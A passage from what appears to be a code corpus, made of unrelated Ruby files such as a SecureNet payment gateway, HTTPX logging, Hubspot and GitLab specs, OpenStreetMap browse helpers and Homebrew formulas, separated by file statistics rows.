Claims::FetchEligibleFixedFeeTypes.new(self).call
end
def external_user_type
:litigator
end
def requires_case_concluded_date?
true
end
private
def provider_delegator
provider
end
def cleaner
LitigatorClaimCleaner.new(self)
end
def assign_total_attrs
# TODO: understand if this check is really needed
# left it here mostly to ensure the new changes do
# not impact anything API related
return if from_api?
if case_type&.is_fixed_fee?
assign_fixed_total_attrs
else
assign_graduated_total_attrs
end
assign_expenses_total if expenses_changed?
return unless total_changes_required?
assign_total
assign_vat
end
def assign_fixed_total_attrs
assign_fees_total(%i[fixed_fee misc_fees]) if fees_changed?
end
def assign_graduated_total_attrs
assign_fees_total(%i[graduated_fee misc_fees]) if fees_changed?
end
def fees_changed?
if case_type&.is_fixed_fee?
fixed_fee_changed? || misc_fees_changed?
else
graduated_fee_changed? || misc_fees_changed?
end
end
def total_changes_required?
fees_changed? || expenses_changed?
end
def fixed_fee_changed?
fixed_fee&.changed?
end
def graduated_fee_changed?
graduated_fee&.changed?
end
end
end
| 29.144531 | 120 | 0.596703 |
1a6aa88fb04d20fd85acb12573e98b48d4dcb33d | 836 | # (c) Copyright 2020 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
module OneviewCookbook
module API1000
module C7000
# LogicalInterconnectGroup API1000 C7000 provider
class LogicalInterconnectGroupProvider < API800::C7000::LogicalInterconnectGroupProvider
end
end
end
end
| 39.809524 | 94 | 0.77512 |
39f63cac6c78caf57eefabb0859624ca40b9ba2c | 1,276 | # frozen_string_literal: true
module HTTPX
module Loggable
COLORS = {
black: 30,
red: 31,
green: 32,
yellow: 33,
blue: 34,
magenta: 35,
cyan: 36,
white: 37,
}.freeze
def log(level: @options.debug_level, color: nil, &msg)
return unless @options.debug
return unless @options.debug_level >= level
debug_stream = @options.debug
message = (+"" << msg.call << "\n")
message = "\e[#{COLORS[color]}m#{message}\e[0m" if color && debug_stream.respond_to?(:isatty) && debug_stream.isatty
debug_stream << message
end
if Exception.instance_methods.include?(:full_message)
def log_exception(ex, level: @options.debug_level, color: nil)
return unless @options.debug
return unless @options.debug_level >= level
log(level: level, color: color) { ex.full_message }
end
else
def log_exception(ex, level: @options.debug_level, color: nil)
return unless @options.debug
return unless @options.debug_level >= level
message = +"#{ex.message} (#{ex.class})"
message << "\n" << ex.backtrace.join("\n") unless ex.backtrace.nil?
log(level: level, color: color) { message }
end
end
end
end
| 25.52 | 122 | 0.607367 |
01c666639a447b8eff8e5de9653f35ad49748396 | 5,599 | describe Hubspot::Utils do
describe ".properties_to_hash" do
let(:properties) do
{
"email" => { "value" => "[email protected]" },
"firstname" => { "value" => "Bob" },
"lastname" => { "value" => "Smith" }
}
end
subject { Hubspot::Utils.properties_to_hash(properties) }
its(["email"]) { should == "[email protected]" }
its(["firstname"]) { should == "Bob" }
its(["lastname"]) { should == "Smith" }
end
describe ".hash_to_properties" do
let(:hash) do
{
"email" => "[email protected]",
"firstname" => "Bob",
"lastname" => "Smith"
}
end
subject { Hubspot::Utils.hash_to_properties(hash) }
it { should be_an_instance_of Array }
its(:length) { should == 3 }
it { should include({ "property" => "email", "value" => "[email protected]" }) }
it { should include({ "property" => "firstname", "value" => "Bob" }) }
it { should include({ "property" => "lastname", "value" => "Smith" }) }
end
describe '.compare_property_lists for ContactProperties' do
let(:example_groups) do
VCR.use_cassette('contact_properties/groups_example') do
HTTParty.get('https://api.hubapi.com/contacts/v2/groups?hapikey=demo').parsed_response
end
end
let(:example_properties) do
VCR.use_cassette('contact_properties/properties_example') do
HTTParty.get('https://api.hubapi.com/contacts/v2/properties?hapikey=demo').parsed_response
end
end
let(:source) { { 'groups' => example_groups, 'properties' => example_properties } }
let!(:target) { Marshal.load(Marshal.dump(source)) }
context 'with no changes' do
it 'should report no changes' do
skip, new_groups, new_props, update_props = Hubspot::Utils.compare_property_lists(Hubspot::ContactProperties, source, target)
expect(skip.count).to be > 0
expect(new_groups.count).to be(0)
expect(new_props.count).to be(0)
expect(update_props.count).to be(0)
end
end
context 'with changes' do
let(:description) { "#{source['properties'][0]['description']}_XXX" }
count = 0
it 'should report the changes' do
10.times do |i|
if !source['properties'][i]['readOnlyDefinition']
source['properties'][i]['description'] = description
source['properties'][i]['createdUserId'] = 2500
count += 1
end
end
skip, new_groups, new_props, update_props = Hubspot::Utils.compare_property_lists(Hubspot::ContactProperties, source, target)
expect(skip.count).to be > 0
expect(new_groups.count).to be(0)
expect(new_props.count).to be(0)
expect(update_props.count).to be(count)
end
end
end
describe '.compare_property_lists for DealProperties' do
let(:example_groups) do
VCR.use_cassette('deal_groups_example') do
HTTParty.get('https://api.hubapi.com/deals/v1/groups?hapikey=demo').parsed_response
end
end
let(:example_properties) do
VCR.use_cassette('deal_properties_example') do
HTTParty.get('https://api.hubapi.com/deals/v1/properties?hapikey=demo').parsed_response
end
end
let(:source) { { 'groups' => example_groups, 'properties' => example_properties } }
let!(:target) { Marshal.load(Marshal.dump(source)) }
context 'with no changes' do
it 'should report no changes' do
skip, new_groups, new_props, update_props = Hubspot::Utils.compare_property_lists(Hubspot::DealProperties, source, target)
expect(skip.count).to be > 0
expect(new_groups.count).to be(0)
expect(new_props.count).to be(0)
expect(update_props.count).to be(0)
end
end
context 'with changes' do
let(:description) { "#{source['properties'][0]['description']}_XXX" }
count = 0
it 'should report the changes' do
10.times do |i|
if !source['properties'][i]['readOnlyDefinition']
source['properties'][i]['description'] = description
source['properties'][i]['createdUserId'] = 2500
count += 1
end
end
skip, new_groups, new_props, update_props = Hubspot::Utils.compare_property_lists(Hubspot::DealProperties, source, target)
expect(skip.count).to be > 0
expect(new_groups.count).to be(0)
expect(new_props.count).to be(0)
expect(update_props.count).to be(count)
end
end
end
describe ".dump_properties" do
it "prints a deprecation warning" do
VCR.use_cassette("dump_deal_properties_and_groups") do
api_key = "demo"
output = capture_stderr do
Hubspot::Utils.dump_properties(Hubspot::DealProperties, api_key)
end
expected_warning = "Hubspot::Utils.dump_properties is deprecated"
expect(output).to include(expected_warning)
end
end
end
describe ".restore_properties" do
it "prints a deprecation warning" do
VCR.use_cassette("restore_deal_properties_and_groups") do
api_key = "demo"
properties = {"groups" => {}, "properties" => {}}
output = capture_stderr do
Hubspot::Utils.restore_properties(
Hubspot::DealProperties,
api_key,
properties
)
end
expected_warning = "Hubspot::Utils.restore_properties is deprecated"
expect(output).to include(expected_warning)
end
end
end
end
| 33.933333 | 133 | 0.616539 |
08af51dbe7c4b5207bce315be91028c9f588408d | 3,619 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Protected Environments' do
let(:project) { create(:project, :repository) }
let(:user) { create(:user) }
let(:environments) { %w(production development staging test) }
before do
stub_licensed_features(protected_environments: true)
environments.each do |environment_name|
create(:environment, name: environment_name, project: project)
end
create(:protected_environment, project: project, name: 'production')
create(:protected_environment, project: project, name: 'removed environment')
sign_in(user)
end
context 'logged in as developer' do
before do
project.add_developer(user)
visit project_settings_ci_cd_path(project)
end
it 'does not have access to Protected Environments settings' do
expect(page).to have_gitlab_http_status(:not_found)
end
end
context 'logged in as a maintainer' do
before do
project.add_maintainer(user)
visit project_settings_ci_cd_path(project)
end
it 'has access to Protected Environments settings' do
expect(page).to have_gitlab_http_status(:ok)
end
it 'allows seeing a list of protected environments' do
within('.protected-branches-list') do
expect(page).to have_content('production')
expect(page).to have_content('removed environment')
end
end
it 'allows creating explicit protected environments', :js do
set_protected_environment('staging')
within('.js-new-protected-environment') do
set_allowed_to_deploy('Developers + Maintainers')
click_on('Protect')
end
wait_for_requests
within('.protected-branches-list') do
expect(page).to have_content('staging')
end
end
it 'allows updating access to a protected environment', :js, quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/11086' do
within('.protected-branches-list tr', text: 'production') do
set_allowed_to_deploy('Developers + Maintainers')
end
visit project_settings_ci_cd_path(project)
within('.protected-branches-list') do
expect(page).to have_content('1 role, 1 user')
end
end
it 'allows unprotecting an environment', :js do
within('.protected-branches-list tr', text: 'production') do
accept_alert { click_on('Unprotect') }
end
wait_for_requests
within('.protected-branches-list') do
expect(page).not_to have_content('production')
end
end
context 'when projects_tokens_optional_encryption feature flag is false' do
before do
stub_feature_flags(projects_tokens_optional_encryption: false)
end
context 'when runners_token exists but runners_token_encrypted is empty' do
before do
project.update_column(:runners_token, 'abc')
project.update_column(:runners_token_encrypted, nil)
end
it 'shows setting page correctly' do
visit project_settings_ci_cd_path(project)
expect(page).to have_gitlab_http_status(:ok)
end
end
end
end
def set_protected_environment(environment_name)
within('.js-new-protected-environment') do
find('.js-protected-environment-select').click
find('.dropdown-input-field').set(environment_name)
find('.is-focused').click
end
end
def set_allowed_to_deploy(option)
click_button('Select users')
within '.gl-new-dropdown-contents' do
Array(option).each { |opt| find('.gl-new-dropdown-item', text: opt).click }
end
end
end
| 28.273438 | 133 | 0.688035 |
f8d725abe2cd59aa78ab57141da39068a6f6230f | 1,039 | require 'paypalhttp'
require "base64"
module PayPal
SANDBOXAPI = 'https://api.sandbox.paypal.com'
LIVEAPI = 'https://api.paypal.com'
SANDBOXWEB = 'https://sandbox.paypal.com'
LIVEWEB = 'https://paypal.com'
class PayPalEnvironment < PayPalHttp::Environment
attr_accessor :client_id, :client_secret, :web_url
def initialize(client_id, client_secret, base_url, web_url)
super(base_url)
@client_id = client_id
@client_secret = client_secret
@web_url = web_url
end
def authorizationString
encoded = Base64.strict_encode64("#{@client_id}:#{@client_secret}")
return "Basic #{encoded}"
end
end
class SandboxEnvironment < PayPal::PayPalEnvironment
def initialize(client_id, client_secret)
super(client_id, client_secret, PayPal::SANDBOXAPI, PayPal::SANDBOXWEB)
end
end
class LiveEnvironment < PayPal::PayPalEnvironment
def initialize(client_id, client_secret)
super(client_id, client_secret, PayPal::LIVEAPI, PayPal::LIVEWEB)
end
end
end | 27.342105 | 77 | 0.715111 |
b9f7256b938ac0664711e7a7c7e2e98b73f580fb | 358 | module Ecm::Contact
# Preview all emails at http://localhost:3000/rails/mailers/ecm/contact/contact_request_mailer
class ContactRequestMailerPreview < ActionMailer::Preview
# Preview this email at http://localhost:3000/rails/mailers/ecm/contact/contact_request_mailer/notify
def notify
ContactRequestMailer.notify
end
end
end
| 29.833333 | 105 | 0.784916 |
e8efcf7bca95fc6c50789f55aafdd59281f3a098 | 164 | class CreateCollections < ActiveRecord::Migration[6.0]
def change
create_table :collections do |t|
t.string :name
t.timestamps
end
end
end
| 18.222222 | 54 | 0.676829 |
1d0991b5f8cb468015ab0590a3ae882b9e0ea0eb | 452 | module SwellMedia
class MediaPolicy < ApplicationPolicy
def admin?
user.admin?
end
def admin_create?
user.admin?
end
def admin_destroy?
user.admin? or record.user == user
end
def admin_edit?
user.admin? or record.user == user
end
def admin_empty_trash?
user.admin?
end
def admin_preview?
user.admin? or record.user == user
end
def admin_update?
user.admin? or record.user == user
end
end
end | 14.125 | 38 | 0.676991 |
b99ba93384b603efd3ea9de115a77b31d2bb87dc | 6,597 | require "cgi"
module BrowseHelper
def printable_name(object, version = false)
id = if object.id.is_a?(Array)
object.id[0]
else
object.id
end
name = t "printable_name.with_id", :id => id.to_s
name = t "printable_name.with_version", :id => name, :version => object.version.to_s if version
# don't look at object tags if redacted, so as to avoid giving
# away redacted version tag information.
unless object.redacted?
locale = I18n.locale.to_s
locale = locale.sub(/-[^-]+/, "") while locale =~ /-[^-]+/ && !object.tags.include?("name:#{I18n.locale}")
if object.tags.include? "name:#{locale}"
name = t "printable_name.with_name_html", :name => content_tag(:bdi, object.tags["name:#{locale}"].to_s), :id => content_tag(:bdi, name)
elsif object.tags.include? "name"
name = t "printable_name.with_name_html", :name => content_tag(:bdi, object.tags["name"].to_s), :id => content_tag(:bdi, name)
elsif object.tags.include? "ref"
name = t "printable_name.with_name_html", :name => content_tag(:bdi, object.tags["ref"].to_s), :id => content_tag(:bdi, name)
end
end
name
end
def link_class(type, object)
classes = [type]
if object.redacted?
classes << "deleted"
else
classes += icon_tags(object).flatten.map { |t| h(t) }
classes << "deleted" unless object.visible?
end
classes.join(" ")
end
def link_title(object)
if object.redacted?
""
else
h(icon_tags(object).map { |k, v| k + "=" + v }.to_sentence)
end
end
def link_follow(object)
"nofollow" if object.tags.empty?
end
def format_key(key)
if url = wiki_link("key", key)
link_to h(key), url, :title => t("browse.tag_details.wiki_link.key", :key => key)
else
h(key)
end
end
def format_value(key, value)
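# Try, in order: Wikipedia article, Wikidata item(s), OSM wiki tag page, telephone link; otherwise fall back to linkify on the escaped value.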
if wp = wikipedia_link(key, value)
link_to h(wp[:title]), wp[:url], :title => t("browse.tag_details.wikipedia_link", :page => wp[:title])
elsif wdt = wikidata_links(key, value)
# IMPORTANT: Note that wikidata_links() returns an array of hashes, unlike for example wikipedia_link(),
# which just returns one such hash.
wdt = wdt.map do |w|
link_to(w[:title], w[:url], :title => t("browse.tag_details.wikidata_link", :page => w[:title].strip))
end
safe_join(wdt, ";")
elsif url = wiki_link("tag", "#{key}=#{value}")
link_to h(value), url, :title => t("browse.tag_details.wiki_link.tag", :key => key, :value => value)
elsif url = telephone_link(key, value)
link_to h(value), url, :title => t("browse.tag_details.telephone_link", :phone_number => value)
else
linkify h(value)
end
end
def type_and_paginated_count(type, pages)
if pages.page_count == 1
t "browse.changeset.#{type}",
:count => pages.item_count
else
t "browse.changeset.#{type}_paginated",
:x => pages.current_page.first_item,
:y => pages.current_page.last_item,
:count => pages.item_count
end
end
private
ICON_TAGS = %w[aeroway amenity barrier building highway historic landuse leisure man_made natural railway shop tourism waterway].freeze
def icon_tags(object)
object.tags.find_all { |k, _v| ICON_TAGS.include? k }.sort
end
def wiki_link(type, lookup)
locale = I18n.locale.to_s
# update-wiki-pages does s/ /_/g on keys before saving them, we
# have to replace spaces with underscore so we'll link
# e.g. `source=Isle of Man Government aerial imagery (2001)' to
# the correct page.
lookup_us = lookup.tr(" ", "_")
if page = WIKI_PAGES.dig(locale, type, lookup_us)
url = "https://wiki.openstreetmap.org/wiki/#{page}?uselang=#{locale}"
elsif page = WIKI_PAGES.dig("en", type, lookup_us)
url = "https://wiki.openstreetmap.org/wiki/#{page}?uselang=#{locale}"
end
url
end
def wikipedia_link(key, value)
# Some k/v's are wikipedia=http://en.wikipedia.org/wiki/Full%20URL
return nil if value =~ %r{^https?://}
if key == "wikipedia"
# This regex should match Wikipedia language codes, everything
# from de to zh-classical
lang = if value =~ /^([a-z-]{2,12}):(.+)$/i
# Value is <lang>:<title> so split it up
# Note that value is always left as-is, see: https://trac.openstreetmap.org/ticket/4315
Regexp.last_match(1)
else
# Value is <title> so default to English Wikipedia
"en"
end
elsif key =~ /^wikipedia:(\S+)$/
# Language is in the key, so assume value is the title
lang = Regexp.last_match(1)
else
# Not a wikipedia key!
return nil
end
if value =~ /^([^#]*)#(.*)/
# Contains a reference to a section of the wikipedia article
# Must break it up to correctly build the url
value = Regexp.last_match(1)
section = "#" + Regexp.last_match(2)
encoded_section = "#" + CGI.escape(Regexp.last_match(2).gsub(/ +/, "_")).tr("%", ".")
else
section = ""
encoded_section = ""
end
{
:url => "https://#{lang}.wikipedia.org/wiki/#{value}?uselang=#{I18n.locale}#{encoded_section}",
:title => value + section
}
end
def wikidata_links(key, value)
# The simple wikidata-tag (this is limited to only one value)
if key == "wikidata" && value =~ /^[Qq][1-9][0-9]*$/
return [{
:url => "//www.wikidata.org/wiki/#{value}?uselang=#{I18n.locale}",
:title => value
}]
# Key has to be one of the accepted wikidata-tags
elsif key =~ /(architect|artist|brand|name:etymology|network|operator|subject):wikidata/ &&
# Value has to be a semicolon-separated list of wikidata-IDs (whitespaces allowed before and after semicolons)
value =~ /^[Qq][1-9][0-9]*(\s*;\s*[Qq][1-9][0-9]*)*$/
# Splitting at every semicolon to get a separate hash for each wikidata-ID
return value.split(";").map do |id|
{ :title => id, :url => "//www.wikidata.org/wiki/#{id.strip}?uselang=#{I18n.locale}" }
end
end
nil
end
def telephone_link(_key, value)
# does it look like a phone number? eg "+1 (234) 567-8901 " ?
return nil unless value =~ %r{^\s*\+[\d\s\(\)/\.-]{6,25}\s*$}
# remove all whitespace instead of encoding it http://tools.ietf.org/html/rfc3966#section-5.1.1
# "+1 (234) 567-8901 " -> "+1(234)567-8901"
value_no_whitespace = value.gsub(/\s+/, "")
"tel:#{value_no_whitespace}"
end
end
| 34.359375 | 144 | 0.610884 |
28343b2b8687f41a1035c77eaf0c49419e479e88 | 848 | require 'rip/version'
Gem::Specification.new do |s|
s.name = "rip"
s.version = Rip::Version
s.date = Time.now.strftime('%Y-%m-%d')
s.summary = "Take back your $LOAD_PATH"
s.homepage = "http://hellorip.com"
s.email = "[email protected]"
s.authors = [ "Chris Wanstrath", "Joshua Peek" ]
s.has_rdoc = false
s.files = %w( README.md Rakefile LICENSE )
s.files += Dir.glob("lib/**/*")
s.files += Dir.glob("bin/**/*")
s.files += Dir.glob("man/**/*")
s.files += Dir.glob("test/**/*")
s.executables = %w( rip )
s.description = <<desc
rip creates and manages environments of packages. rip packages
may be created from RubyGems, git repositories, or more.
Feed me.
desc
end
| 32.615385 | 62 | 0.522406 |
87aa9ababd0eae71931a0e82578c3b8a9b692f14 | 9,005 | module ActiveMerchant #:nodoc:
module Billing #:nodoc:
class SecureNetGateway < Gateway
API_VERSION = "4.0"
TRANSACTIONS = {
:auth_only => "0000",
:auth_capture => "0100",
:prior_auth_capture => "0200",
:void => "0400",
:credit => "0500"
}
XML_ATTRIBUTES = {
'xmlns' => "http://gateway.securenet.com/API/Contracts",
'xmlns:i' => "http://www.w3.org/2001/XMLSchema-instance"
}
NIL_ATTRIBUTE = { 'i:nil' => "true" }
self.supported_countries = ['US']
self.supported_cardtypes = [:visa, :master, :american_express, :discover]
self.homepage_url = 'http://www.securenet.com/'
self.display_name = 'SecureNet'
self.test_url = 'https://certify.securenet.com/API/gateway.svc/webHttp/ProcessTransaction'
self.live_url = 'https://gateway.securenet.com/api/Gateway.svc/webHttp/ProcessTransaction'
APPROVED, DECLINED = 1, 2
CARD_CODE_ERRORS = %w( N S )
AVS_ERRORS = %w( A E N R W Z )
def initialize(options = {})
requires!(options, :login, :password)
super
end
def authorize(money, creditcard, options = {})
commit(build_sale_or_authorization(creditcard, options, :auth_only, money))
end
def purchase(money, creditcard, options = {})
commit(build_sale_or_authorization(creditcard, options, :auth_capture, money))
end
def capture(money, authorization, options = {})
commit(build_capture_refund_void(authorization, options, :prior_auth_capture, money))
end
def void(authorization, options = {})
commit(build_capture_refund_void(authorization, options, :void))
end
def refund(money, authorization, options = {})
commit(build_capture_refund_void(authorization, options, :credit, money))
end
def credit(money, authorization, options = {})
ActiveMerchant.deprecated CREDIT_DEPRECATION_MESSAGE
refund(money, authorization, options)
end
private
def commit(request)
xml = build_request(request)
url = test? ? self.test_url : self.live_url
data = ssl_post(url, xml, "Content-Type" => "text/xml")
response = parse(data)
Response.new(success?(response), message_from(response), response,
:test => test?,
:authorization => build_authorization(response),
:avs_result => { :code => response[:avs_result_code] },
:cvv_result => response[:card_code_response_code]
)
end
def build_request(request)
xml = Builder::XmlMarkup.new
xml.instruct!
xml.tag!("TRANSACTION", XML_ATTRIBUTES) do
xml << request
end
xml.target!
end
def build_sale_or_authorization(creditcard, options, action, money)
xml = Builder::XmlMarkup.new
xml.tag! 'AMOUNT', amount(money)
add_credit_card(xml, creditcard)
add_params_in_required_order(xml, action, creditcard, options)
add_more_required_params(xml, options)
xml.target!
end
def build_capture_refund_void(authorization, options, action, money = nil)
xml = Builder::XmlMarkup.new
transaction_id, amount_in_ref, last_four = split_authorization(authorization)
xml.tag! 'AMOUNT', amount(money) || amount_in_ref
xml.tag!("CARD") do
xml.tag! 'CARDNUMBER', last_four
end
add_params_in_required_order(xml, action, nil, options)
xml.tag! 'REF_TRANSID', transaction_id
add_more_required_params(xml, options)
xml.target!
end
def add_credit_card(xml, creditcard)
xml.tag!("CARD") do
xml.tag! 'CARDCODE', creditcard.verification_value if creditcard.verification_value?
xml.tag! 'CARDNUMBER', creditcard.number
xml.tag! 'EXPDATE', expdate(creditcard)
end
end
def add_customer_data(xml, options)
if options.has_key? :customer
xml.tag! 'CUSTOMERID', options[:customer]
end
if options.has_key? :ip
xml.tag! 'CUSTOMERIP', options[:ip]
end
end
def add_address(xml, creditcard, options)
return unless creditcard
if address = options[:billing_address] || options[:address]
xml.tag!("CUSTOMER_BILL") do
xml.tag! 'ADDRESS', address[:address1].to_s
xml.tag! 'CITY', address[:city].to_s
xml.tag! 'COMPANY', address[:company].to_s
xml.tag! 'COUNTRY', address[:country].to_s
if options.has_key? :email
xml.tag! 'EMAIL', options[:email]
xml.tag! 'EMAILRECEIPT', 'FALSE'
end
xml.tag! 'FIRSTNAME', creditcard.first_name
xml.tag! 'LASTNAME', creditcard.last_name
xml.tag! 'PHONE', address[:phone].to_s
xml.tag! 'STATE', address[:state].blank? ? 'n/a' : address[:state]
xml.tag! 'ZIP', address[:zip].to_s
end
end
if address = options[:shipping_address]
xml.tag!("CUSTOMER_SHIP") do
xml.tag! 'ADDRESS', address[:address1].to_s
xml.tag! 'CITY', address[:city].to_s
xml.tag! 'COMPANY', address[:company].to_s
xml.tag! 'COUNTRY', address[:country].to_s
if address[:name]
names = address[:name].split
last_name = names.pop
first_name = names.join(" ")
xml.tag! 'FIRSTNAME', first_name
xml.tag! 'LASTNAME', last_name
else
xml.tag! 'FIRSTNAME', address[:first_name].to_s
xml.tag! 'LASTNAME', address[:last_name].to_s
end
xml.tag! 'STATE', address[:state].blank? ? 'n/a' : address[:state]
xml.tag! 'ZIP', address[:zip].to_s
end
else
xml.tag!('CUSTOMER_SHIP', NIL_ATTRIBUTE) do
end
end
end
def add_merchant_key(xml, options)
xml.tag!("MERCHANT_KEY") do
xml.tag! 'GROUPID', 0
xml.tag! 'SECUREKEY', @options[:password]
xml.tag! 'SECURENETID', @options[:login]
end
end
# SecureNet requires some of the xml params to be in a certain order. http://cl.ly/image/3K260E0p0a0n/content.png
def add_params_in_required_order(xml, action, creditcard, options)
xml.tag! 'CODE', TRANSACTIONS[action]
add_customer_data(xml, options)
add_address(xml, creditcard, options)
xml.tag! 'DCI', 0 # No duplicate checking will be done, except for ORDERID
xml.tag! 'INSTALLMENT_SEQUENCENUM', 1
xml.tag! 'INVOICEDESC', options[:invoice_description] if options[:invoice_description]
xml.tag! 'INVOICENUM', options[:invoice_number] if options[:invoice_number]
add_merchant_key(xml, options)
xml.tag! 'METHOD', 'CC'
xml.tag! 'NOTE', options[:description] if options[:description]
xml.tag! 'ORDERID', options[:order_id]
xml.tag! 'OVERRIDE_FROM', 0 # Docs say not required, but doesn't work without it
end
def add_more_required_params(xml, options)
xml.tag! 'RETAIL_LANENUM', '0'
xml.tag! 'TEST', 'TRUE' if test?
xml.tag! 'TOTAL_INSTALLMENTCOUNT', 0
xml.tag! 'TRANSACTION_SERVICE', 0
end
def success?(response)
response[:response_code].to_i == APPROVED
end
def message_from(response)
if response[:response_code].to_i == DECLINED
return CVVResult.messages[ response[:card_code_response_code] ] if CARD_CODE_ERRORS.include?(response[:card_code_response_code])
return AVSResult.messages[ response[:avs_result_code] ] if AVS_ERRORS.include?(response[:avs_result_code])
end
return response[:response_reason_text].nil? ? '' : response[:response_reason_text][0..-1]
end
def parse(xml)
response = {}
xml = REXML::Document.new(xml)
root = REXML::XPath.first(xml, "//GATEWAYRESPONSE")
if root
root.elements.to_a.each do |node|
recurring_parse_element(response, node)
end
end
response
end
def recurring_parse_element(response, node)
if node.has_elements?
node.elements.each{|e| recurring_parse_element(response, e) }
else
response[node.name.underscore.to_sym] = node.text
end
end
def split_authorization(authorization)
transaction_id, amount, last_four = authorization.split("|")
[transaction_id, amount, last_four]
end
def build_authorization(response)
[response[:transactionid], response[:transactionamount], response[:last4_digits]].join("|")
end
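      # For illustration (format inferred from the two methods above, not a
      # documented API contract): an authorization string has the shape
      # "transactionid|transactionamount|last4_digits"; build_authorization
      # assembles it from the gateway response and split_authorization breaks
      # it apart again for capture, refund and void.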
end
end
end
| 34.109848 | 138 | 0.6 |
d50389f9fd60a8c3a2e948f27fdf71112866da28 | 114 | class AddTokenToTickets < ActiveRecord::Migration
def change
add_column :tickets, :token, :string
end
end
| 19 | 49 | 0.754386 |
08ad7737e529397e08c0d191683d9bd52f50ffe2 | 1,366 | class Cig < Formula
desc "CLI app for checking the state of your git repositories"
homepage "https://github.com/stevenjack/cig"
url "https://github.com/stevenjack/cig/archive/v0.1.5.tar.gz"
sha256 "545a4a8894e73c4152e0dcf5515239709537e0192629dc56257fe7cfc995da24"
license "MIT"
head "https://github.com/stevenjack/cig.git"
bottle do
cellar :any_skip_relocation
rebuild 2
sha256 "79ca68ff327c9de3193100fcbd5c010ea003377d902900b3f23dcaa1d6319e16" => :big_sur
sha256 "bb93970229fc7a62a6ca4b0c446ad36f135d2160aa0dce04fa5afbdc072291d3" => :catalina
sha256 "6ae38e73bed4326d85c7f31498b0a5715d877c7a2e32aad9987ba7726efe240e" => :mojave
sha256 "9215f225d4b314d1047f6bb4e5c909b82b456d2005fffed8c637ca2d63641791" => :high_sierra
sha256 "5d4eb1f34f8b185513d59dc9072f1a95555dd222f0f7a0526c89983e1643fef6" => :sierra
end
depends_on "go" => :build
depends_on "godep" => :build
def install
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/stevenjack").mkpath
ln_s buildpath, "src/github.com/stevenjack/cig"
system "godep", "restore"
system "go", "build", "-o", bin/"cig"
end
test do
repo_path = "#{testpath}/test"
system "git", "init", "--bare", repo_path
(testpath/".cig.yaml").write <<~EOS
test_project: #{repo_path}
EOS
system "#{bin}/cig", "--cp=#{testpath}"
end
end
| 35.025641 | 93 | 0.732796 |
f80bb4ce71375c66b7e6605ade79b379776a1350 | 228 | class UserToken < ActiveRecord::Base
after_create :generate_token
private
def generate_token
self.token = Digest::SHA1.hexdigest("--#{self.user_id}-mmmm-salty-#{self.created_at.to_s}--")
self.save
end
end
| 17.538462 | 97 | 0.701754 |
7aa8199f27ab82d794796976323354338b82d109 | 533 | # encoding: utf-8
# frozen_string_literal: true
module ProxyPacRb
module Cli
# Shared methods for all cli commands
module Shared
# Enable debug mode
def enable_debug_mode
ProxyPacRb.enable_debug_mode if options[:debug_mode] == true
end
# Remove proxy variables
def remove_proxy_environment_variables
%w(
http_proxy
https_proxy
HTTP_PROXY
HTTPS_PROXY
).each do |v|
ENV.delete(v)
end
end
end
end
end
| 20.5 | 68 | 0.60788 |
f8329da4f2b5289a604f92b02881abbd0657be08 | 190 | # frozen_string_literal: true
FactoryBot.define do
factory :pdf_template, class: "CscCore::PdfTemplate" do
name { FFaker::Name.name }
language_code { "km" }
program
end
end
| 19 | 57 | 0.7 |
f7deafe69242d97954cb17f0d10f52e36541ef20 | 968 | class Zsdx < Formula
desc "Zelda Mystery of Solarus DX"
homepage "http://www.solarus-games.org/games/zelda-mystery-of-solarus-dx/"
url "https://github.com/christopho/zsdx/archive/zsdx-1.11.0.tar.gz"
sha256 "05a5d220bbf2439c9da2e71cd9d104240878123fff5bc702e2405d6d0712f0dc"
head "https://github.com/christopho/zsdx.git"
bottle do
cellar :any_skip_relocation
sha256 "2787c78e1b24669a1befa354724f77b6a86abf2aade492fe211c296482855cf8" => :sierra
sha256 "2a1132ca3dc96d98332d99e1a37b1d2f46206fdad88066f96fedcfbf796452b3" => :el_capitan
sha256 "c9fd0e90a1cf311d30a3e5b961e15a2e8a5a2400b1d985fc4f8c4591cca051d4" => :yosemite
end
depends_on "cmake" => :build
depends_on "solarus"
def install
system "cmake", ".", *std_cmake_args, "-DSOLARUS_INSTALL_DATADIR=#{share}"
system "make", "install"
end
test do
system Formula["solarus"].bin/"solarus-run", "-help"
system "/usr/bin/unzip", pkgshare/"data.solarus"
end
end
| 34.571429 | 92 | 0.757231 |
5dd312c35f7c5f4fe159b589428b9c5eab4b7498 | 1,241 | # frozen_string_literal: true
module AbideDevUtils
module Files
class Writer
MSG_EXT_APPEND = 'Appending %s extension to file'
def write(content, file: nil, add_ext: true, file_ext: nil)
valid_file = add_ext ? append_ext(file, file_ext) : file
File.open(valid_file, 'w') { |f| f.write(content) }
verify_write(valid_file)
end
def method_missing(m, *args, **kwargs, &_block)
if m.to_s.match?(/^write_/)
ext = m.to_s.split('_')[-1]
write(args[0], **kwargs, file_ext: ext)
else
super
end
end
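      # Illustrative usage of the dynamic write_<ext> helpers handled above
      # (the content and file name are assumptions, not from the original code):
      #
      #   AbideDevUtils::Files::Writer.new.write_yaml("key: value\n", file: 'summary')
      #   # method_missing extracts the "yaml" suffix, #append_ext adds ".yaml",
      #   # and the content is written to "summary.yaml" by #write.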
def respond_to_missing?(method_name, include_private = false)
method_name.to_s.start_with?('write_') || super
end
def append_ext(file_path, ext)
return file_path if ext.nil?
s_ext = ".#{ext}"
unless File.extname(file_path) == s_ext
puts MSG_EXT_APPEND % s_ext
file_path << s_ext
end
file_path
end
def verify_write(file_path)
if File.file?(file_path)
puts "Successfully wrote to #{file_path}"
else
puts "Something went wrong! Failed writing to #{file_path}!"
end
end
end
end
end
| 25.854167 | 70 | 0.587429 |
b969a0d80ae04d1572035bb771ca23a4a3b02f08 | 108 | # frozen_string_literal: true
module Admin
class KidHerosController < Koi::AdminCrudController
end
end
| 15.428571 | 53 | 0.805556 |
5d79f247424284b4534b89247d8a1272e418c121 | 891 | require_relative '../spec_helper'
describe FoodCritic::Review do
it "is instantiable with no warnings" do
FoodCritic::Review.new('example', [], false)
end
describe "#cookbook_paths" do
